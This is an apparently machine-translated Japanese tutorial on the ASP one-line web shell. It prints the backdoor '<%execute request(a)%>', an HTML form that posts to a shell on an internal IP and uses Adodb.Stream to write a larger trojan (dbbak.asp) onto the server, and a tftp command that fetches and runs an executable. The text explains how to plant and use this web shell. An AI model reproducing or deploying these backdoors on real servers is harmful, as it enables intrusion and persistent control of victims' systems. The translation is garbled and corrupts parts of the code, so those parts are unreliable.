一文のトロイの木馬は ASP ファイルに挿入されます。もちろん、一文のトロイの木馬自体は ASP ファイルです。 IEでアクセス可能:アクセス可能な場合のみ、データを送信可能です。
HTTPプロトコル経由でアクセスする
トロイの木馬の使用範囲を一言で言うと (ここでは 2 種類だけ挙げました):
1) データベースのバックアップのみが必要です
データベースを ASP ファイルにバックアップすると、コンパイル エラーは発生せず、スクリプト終了フラグがありません %>
2) SA 権限を設定するときは、便宜上、最初に文を書きます (もちろん、tftp 経由で直接鳩をアップロードして実行する方が速いです)。
tftp -i ip サーバー.exe を取得
トロイの木馬 <%execute request(a)%> の原理を一文で表すと次のようになります。
まず知ってください
execute() 関数は、ASP コードを実行するために使用され、アップロードした馬を実行し、それを分析のために asp.dll に渡します。この関数は次のように説明できます。
<%
if request(a)<> then request(a) を実行します
%>
a が空でない場合は実行されます。何が実行されますか?
!= 0 の場合
クライアントを見てみましょう。
<フォームアクション=http://192.168.0.28/shell.aspメソッド=ポスト>
<textarea name=lcols=120 rows=10 width=45>
set lP=server.CreateObject(Adodb.Stream) 'Adodb.Stream コンポーネントを作成します。
lP.オープン
lP.タイプ=2
lP.CharSet=gb2312
lP.writetext リクエスト(p)
lP.SaveToFile サーバー.マップパス(dbbak.asp),2
lP.閉じる
LP=何も設定しない
応答.リダイレクト dbbak.asp
</textarea>
<textarea name=pcols=120 rows=10 width=45>提出するデータ</textarea><BR><center><br>
<入力タイプ=送信値=送信>
Adodb.Stream は、読み取りデータをサーバーにアップロードする役割を果たします。
コンポーネント: Adodb.Stream
以下のような方法があります。
キャンセル方法
使い方
オブジェクト.キャンセル
説明: 保留中の非同期 Execute または Open メソッド呼び出しの実行をキャンセルします。
WriteText メソッド
使用方法:
Object.Write(データ,[オプション])
説明: 指定されたテキスト データをオブジェクトにロードします。
パラメータの説明: Data は書き込む指定された内容です。
オプション 書き込むオプション。オプションのパラメータは次のとおりです。
adWriteChar =0
adWriteLine =1
SaveToFile メソッド
使用方法:
Object.SaveToFile(ファイル名,[オプション])
説明: オブジェクトの内容を FileName で指定されたファイルに書き込みます
つまり、トロイの木馬を保存するファイル名は dbbak.asp です。
パラメータの説明: FileName で指定されたファイル
オプションはオプションにアクセスします。オプションのパラメータは次のとおりです。
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
文トロイの木馬を送信した後、a の値は空になり、http://www.***.com/**.asp へのアクセスが待機プロセスになります。 ) 関数.. 。
データをサーバーに書き込む役割を持つ Adodb.Stream を作成します...
同時に、このコンポーネントによって定義された変数 SaveToFile はマレーシア名..dbbak.asp を定義します。
サーバーに送信した後、execute() 関数は a の値が空ではないことを検出し、マレーシアを実行します。